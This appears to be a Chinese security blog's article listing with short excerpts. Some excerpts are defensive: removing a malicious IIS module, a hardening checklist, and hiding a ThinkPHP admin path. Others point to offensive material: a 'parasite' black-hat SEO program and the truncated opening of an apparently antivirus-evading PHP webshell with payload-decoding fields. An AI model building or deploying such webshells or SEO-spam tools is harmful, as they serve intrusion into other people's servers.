admin的文章

阅读(23)

阅读(116)

2021饶茂寄生虫程 泛目录. TDK 自动转码

阅读(42)

点开啊D，进程查看，定位到web进程，w3wp.exe 加载了一个连公司信息和说明都有不起的dll。豁然开朗。 查： 查看IIS全局设置中isapi筛选器和模块设置，在模块功能下找到了真凶。 杀： 找到问题后，处理就比较简单，右键删除模块，...

阅读(105)

免杀阿D 密码A  <?php class x { public $payload = null; public $decode_payload = null; function __construct() { $this-...

阅读(328)

阅读(116)

禁止鼠标右键和选择 <script> function iEsc(){ return false; } function iRec(){ return true; } function DisableKeys() { if(ev...

阅读(216)

阅读(123)

程序部分 1.入口文件加入SQL关键字过滤(立刻要做), API的有多维数据的需要注意 2.任何密码要有等级检测, 密码位数提高到8位以上 3.纯数字的支付密码也要有安全检测, 如’123456’的密码将不能通过 4.登录/支付密码连续错误...

阅读(164)

现在需要修改后台模块的访问地址，以防被别有用心的人很容易就猜到，然后各种乱搞… （在公共配置文件/Application/Common/Conf/config.php中，设置模块映射） 'URL_MODULE_MAP' =>...

阅读(196)

相信很多的PHP程序员都用过ThinkPHP框架开发过项目。以ThinkPHP5版本举例，我们都知道后台“www.test.com/admin“是我们最常用的登录入口，方便我们的同时也留下了一定的隐患，如果你刚好使用了“admin/1234...